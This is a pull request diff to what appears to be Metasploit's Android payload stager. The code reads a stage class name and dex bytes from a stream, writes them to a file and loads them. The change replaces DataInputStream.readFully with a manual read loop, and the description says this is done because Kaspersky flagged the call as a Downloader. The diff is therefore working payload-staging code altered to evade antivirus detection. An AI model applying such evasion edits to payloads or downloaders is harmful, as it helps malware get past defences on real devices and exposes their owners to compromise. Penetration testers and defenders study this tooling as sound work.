### PR TITLE
avoid DataInputStream.readFully for AV

### DIFF
--- a/java/androidpayload/app/src/com/metasploit/stage/Payload.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/Payload.java
@@ -153,6 +153,19 @@ public class Payload {
         }
     }
 
+    private static byte[] loadBytes(DataInputStream in) throws Exception {
+        int byteLen = in.readInt();
+        byte[] bytes = new byte[byteLen];
+        int n = 0;
+        while (n < byteLen) {
+            int count = in.read(bytes, n, byteLen - n);
+            if (count < 0)
+                throw new Exception();
+            n += count;
+        }
+        return bytes;
+    }
+
     private static void runNextStage(DataInputStream in, OutputStream out, Object[] parameters) throws Exception {
         try {
             Class<?> existingClass = Payload.class.getClassLoader().
@@ -166,22 +179,16 @@ public class Payload {
             String dexPath = path + File.separatorChar + "payload.dex";
 
             // Read the class name
-            int coreLen = in.readInt();
-            byte[] core = new byte[coreLen];
-            in.readFully(core);
-            String classFile = new String(core);
+            String classFile = new String(loadBytes(in));
 
             // Read the stage
-            coreLen = in.readInt();
-            core = new byte[coreLen];
-            in.readFully(core);
-
+            byte[] stageBytes = loadBytes(in);
             File file = new File(filePath);
             if (!file.exists()) {
                 file.createNewFile();
             }
             FileOutputStream fop = new FileOutputStream(file);
-            fop.write(core);
+            fop.write(stageBytes);
             fop.flush();
             fop.close();
 


### PR DESCRIPTION
https://github.com/rapid7/metasploit-framework/issues/8034
Kapersky was flagging DataInputStream.readFully as a Downloader.